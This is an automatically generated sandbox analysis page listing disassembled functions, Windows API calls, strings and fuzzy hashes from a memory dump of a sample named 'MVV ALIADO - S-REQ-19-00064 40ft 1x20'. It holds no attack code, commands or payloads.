Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b5a7d845d0e34177feacb8db6f874e1ce5e7352c48322cfba60e0a902b54a6a4
Instruction ID: 75526ceed659f4efa6279addbfdacb87ef852502f82282590f75b072f98d6f81
Opcode Fuzzy Hash: b5a7d845d0e34177feacb8db6f874e1ce5e7352c48322cfba60e0a902b54a6a4
Instruction Fuzzy Hash: 1421C572611258BFDF218F55CC85EFB3BABEF89750F018129F9445B291CA719C518BA0

Function 006EA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006EA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006EA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006EA48F

Strings

msctls_trackbar32, xrefs: 006EA444

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3473718dfad67f6d27edab8654244f19d4f8d485d0ca17a8f73806695de07276
Instruction ID: dca6563e52abac4afda4a0e992a2eb87342a4e0688a2dae63e94242ea0058a6c
Opcode Fuzzy Hash: 3473718dfad67f6d27edab8654244f19d4f8d485d0ca17a8f73806695de07276
Instruction Fuzzy Hash: A911E771200348BEEF245FA5CC45FEB37AAEF89754F014128FA45961D1D6B6E811C724

Function 006A2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,006A2350,?), ref: 006A22A1
GetProcAddress.KERNEL32(00000000), ref: 006A22A8

Strings

combase.dll, xrefs: 006A229C
RoInitialize, xrefs: 006A2290

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 2bf84f4491cdd19dff04c539c29f023354a92a8dc91ac20b32c5513e266d284b
Instruction ID: fea6b698b65da2ca916a10c94cd6360cd20eae34faf002a4f4ed51ae6abdabf5
Opcode Fuzzy Hash: 2bf84f4491cdd19dff04c539c29f023354a92a8dc91ac20b32c5513e266d284b
Instruction Fuzzy Hash: 4BE01AB46A0305EBEB206FB4ED4AB5836A6B706B06F00C121B242D51E0DBBC4840CF4D

Function 006A235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006A2276), ref: 006A2376
GetProcAddress.KERNEL32(00000000), ref: 006A237D

Strings

combase.dll, xrefs: 006A2371
RoUninitialize, xrefs: 006A2365

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: a523b2a1b51b8d0af5289327a39e303e05c85bb0bc047de5cba1b07b1c4ed997
Instruction ID: 0b6fbb32b3cc1d47d45dee1dd9a1fd9f39dff0ab6589fafb07a49089923f8c59
Opcode Fuzzy Hash: a523b2a1b51b8d0af5289327a39e303e05c85bb0bc047de5cba1b07b1c4ed997
Instruction Fuzzy Hash: CAE0BFB45C4305EBDB306FA0ED1DB483A66B716706F118525F249D11B0EBBD58108A5D

Function 006FAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006FAC60
__swprintf.LIBCMT ref: 006FAC94

Strings

%.3d, xrefs: 006FAC6E
WIN_XPe, xrefs: 006FACD3

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 050dfb75bbb9dc34b8dac5fee979befbb47d3a94c195f30603bf74d1ec9b5bec
Instruction ID: 86e7b0d0ac62e2502cde817cbfde96a367e97bd301483a912eadd972008f83ba
Opcode Fuzzy Hash: 050dfb75bbb9dc34b8dac5fee979befbb47d3a94c195f30603bf74d1ec9b5bec
Instruction Fuzzy Hash: 49E012F180461CDBCB51A7D0CD05DFA737EB704741F1000D2FA0AA1000D635DB86AA16

Function 006E2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006E21FB,?,006E23EF), ref: 006E2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 006E2225

Strings

GetProcessId, xrefs: 006E221F
kernel32.dll, xrefs: 006E220E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 36d1925fc146b39fd0eee796f10f2b832a31bf75594b67cf383728551fe645c0
Instruction ID: 86c8ac2567a5031a9c5d1e88b19fe9def6e23845c9f487f5eb8731c6768d9360
Opcode Fuzzy Hash: 36d1925fc146b39fd0eee796f10f2b832a31bf75594b67cf383728551fe645c0
Instruction Fuzzy Hash: 5BD0A7B581071BDFD7315F71F80864176EBEB08301F01841DE841E3251DF78DC808660

Function 006842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,006842EC,?,006842AA,?), ref: 00684304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00684316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00684310
kernel32.dll, xrefs: 006842FF

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 0853ed599d0a702be34afc55d2897e6c3f27d999743344418fecb2749c279017
Instruction ID: f2dd4f6ebb2143780d48cc5642c54c886972209a236e1d1d00c383b495f33af1
Opcode Fuzzy Hash: 0853ed599d0a702be34afc55d2897e6c3f27d999743344418fecb2749c279017
Instruction Fuzzy Hash: 98D0A77044071BDFD7306F61E80C64176D5AB04301F01851DF441D2261DFB8CC808750

Function 0068434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,006841BB,00684341,?,0068422F,?,006841BB,?,?,?,?,006839FE,?,00000001), ref: 00684359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0068436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00684365
kernel32.dll, xrefs: 00684354

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 1ae093cb9043aea21962d5710bfc8d5aa68b28d2d869ece1e19a75208bf26d3a
Instruction ID: b1f4b108a2d82dbc1f733ebd8704a9cd8a6f2fb9927c97f0988abb8f6bf8318c
Opcode Fuzzy Hash: 1ae093cb9043aea21962d5710bfc8d5aa68b28d2d869ece1e19a75208bf26d3a
Instruction Fuzzy Hash: 5CD0A770444717DFE7306FB1E80864176E5AB14715F01862DE481D2250DFB8DC808750

Function 006C0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,006C052F,?,006C06D7), ref: 006C0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 006C0584

Strings

oleaut32.dll, xrefs: 006C056D
UnRegisterTypeLibForUser, xrefs: 006C057E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 9f717d96b9a80ed7c33a4bdf936700b9f890cb066c61a6a99be8a4d922ecb727
Instruction ID: 4e4ca4f348456ac3d7ea0db6025806249d952920076b4aaa3334b32f9a379d53
Opcode Fuzzy Hash: 9f717d96b9a80ed7c33a4bdf936700b9f890cb066c61a6a99be8a4d922ecb727
Instruction Fuzzy Hash: 70D05E70454312DBEB205F64A808B52B7E5AB04300F51861EE84192251DE78C8808A60

Function 006C0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,006C051D,?,006C05FE), ref: 006C0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 006C0559

Strings

oleaut32.dll, xrefs: 006C0542
RegisterTypeLibForUser, xrefs: 006C0553

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 56d9c8835a76b5e8b48e98fd4c2d7b9a1717cb7e44401f828ed35ee23c106c8f
Instruction ID: b5ea12d2e57a2422044a45cdcf0eed58919448568c7844ad3d8a0c86c2e0d664
Opcode Fuzzy Hash: 56d9c8835a76b5e8b48e98fd4c2d7b9a1717cb7e44401f828ed35ee23c106c8f
Instruction Fuzzy Hash: 83D0A770404713DFE7308F60E808B91B6E5EB04301F51C41DE446D2352DE78CC808A50

Function 006DECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006DECBE,?,006DEBBB), ref: 006DECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006DECE8

Strings

GetSystemWow64DirectoryW, xrefs: 006DECE2
kernel32.dll, xrefs: 006DECD1

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 249578e962fd1df0dce21506cf516ddd4f74b22cdc74feb447edb2b2b95a379b
Instruction ID: cee5cc8aed46663a8533e7909f19ca0b62143ab3356fcda8b1d1fd29d7d7af2e
Opcode Fuzzy Hash: 249578e962fd1df0dce21506cf516ddd4f74b22cdc74feb447edb2b2b95a379b
Instruction Fuzzy Hash: 6FD05E708107279EDB206BA0A84864276E5AB04300F01C42AA85592352DF78D8808650

Function 006DBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,006DBAD3,00000001,006DB6EE,?,0071DC00), ref: 006DBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006DBAFD

Strings

kernel32.dll, xrefs: 006DBAE6
GetModuleHandleExW, xrefs: 006DBAF7

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 9f996de7d0adc26acdeca2a12b93ca78cf02c6e7012bd3c83850a03d73eca886
Instruction ID: 6b6162dc21c471d0126638e33504cfd1219a3c3e51cd5b97bd2eccaba07dae03
Opcode Fuzzy Hash: 9f996de7d0adc26acdeca2a12b93ca78cf02c6e7012bd3c83850a03d73eca886
Instruction Fuzzy Hash: 77D0A770D00716DFD7345F61E849B5576D5AB05300F02841FE843D2354DF78DC80C654

Function 006E3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,006E3BD1,?,006E3E06), ref: 006E3BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006E3BFB

Strings

advapi32.dll, xrefs: 006E3BE4
RegDeleteKeyExW, xrefs: 006E3BF5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: c66e90efa0a08086c401639233fcef34e10786dda6e42502d23c2ce9b8ca8c09
Instruction ID: 1ebdbeee411b0f9263d898ffa267120cbf170af0a097650c443ccd737b6b0d61
Opcode Fuzzy Hash: c66e90efa0a08086c401639233fcef34e10786dda6e42502d23c2ce9b8ca8c09
Instruction Fuzzy Hash: 46D0A7F0400766DFD7305FA5EC0D643BAF5AB05714F218419E445E3350EEB8DC808E50

Function 006B9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ec4f0b7fd92b818e1e69557f234ce389c53826bb2613e5808d3decbca47b43c
Instruction ID: 300ebc745fa939d02926c35679ee86dd7b6f302b2e589325e374d27e68b57fe7
Opcode Fuzzy Hash: 3ec4f0b7fd92b818e1e69557f234ce389c53826bb2613e5808d3decbca47b43c
Instruction Fuzzy Hash: A8C130B5A0021AEFDB14DF94C884AEEB7B6FF48704F148598EA05DB251D730DE81DBA4

Function 006DAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006DAAB4
CoUninitialize.OLE32 ref: 006DAABF

Part of subcall function 006C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006C027B

VariantInit.OLEAUT32(?), ref: 006DAACA
VariantClear.OLEAUT32(?), ref: 006DAD9D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: af39220c882e14b1227edea7885ab35b6b1a22ef707ccf80600cb4f810a5f3e1
Instruction ID: 490105c84dcdadae01c22656d42fc89759d4a675cb16720eca7f94cc7be8201d
Opcode Fuzzy Hash: af39220c882e14b1227edea7885ab35b6b1a22ef707ccf80600cb4f810a5f3e1
Instruction Fuzzy Hash: F7A17D356087019FCB51EF54C891B6AB7E6BF48710F14854EFA969B3A1CB30ED01CB9A

Function 006B91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006B91DD
SysAllocString.OLEAUT32(?), ref: 006B9286
VariantCopy.OLEAUT32 ref: 006B92B5
VariantClear.OLEAUT32(?), ref: 006B92DC

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: a8958ad1f4ffd2a1b7d8bd07f2fa829a2a30e50bc24bbf6a231b2320e11f1d28
Instruction ID: cf073ed8c750cf1c727c4cf407ad12e2ab62dedeee26583b978322f68a5e83c0
Opcode Fuzzy Hash: a8958ad1f4ffd2a1b7d8bd07f2fa829a2a30e50bc24bbf6a231b2320e11f1d28
Instruction Fuzzy Hash: 5C51B2B06143069BDB64AF65D491BAEB3EBEF45314F20881FE746CB2D1DB7098C18729

Function 006EC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00CB4B30,?), ref: 006EC544
ScreenToClient.USER32(?,00000002), ref: 006EC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 006EC5DA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 49a2c8b6614dc95c2eb15c25bcc06646f4cd5c524dcdfbbb587e677566849bdb
Instruction ID: 97c6b73da7af0f85023ba4313d4609a944653d8000690fca418289bc2ccfe0eb
Opcode Fuzzy Hash: 49a2c8b6614dc95c2eb15c25bcc06646f4cd5c524dcdfbbb587e677566849bdb
Instruction Fuzzy Hash: 18515B75901244EFCF20DF69C880AEE7BB6FB45360F108659F8259B290D730ED92CB90

Function 006BC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 006BC462
__itow.LIBCMT ref: 006BC49C

Part of subcall function 006BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 006BC753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 006BC505
__itow.LIBCMT ref: 006BC55A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 36ad80ed8cbd5d5d3fd711ce41295ce2bb79d2df30ebeeba012afb6b657b9bbf
Instruction ID: 1b4bee5fb1976dc1eb13b6d99d703a3468aa48d8c807e54cdcf875eac054746d
Opcode Fuzzy Hash: 36ad80ed8cbd5d5d3fd711ce41295ce2bb79d2df30ebeeba012afb6b657b9bbf
Instruction Fuzzy Hash: A141C7B1A00608AFDF21EF54C855FEE7BB6AF49720F00001DF946A7281DB749B95CBA5

Function 006C390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

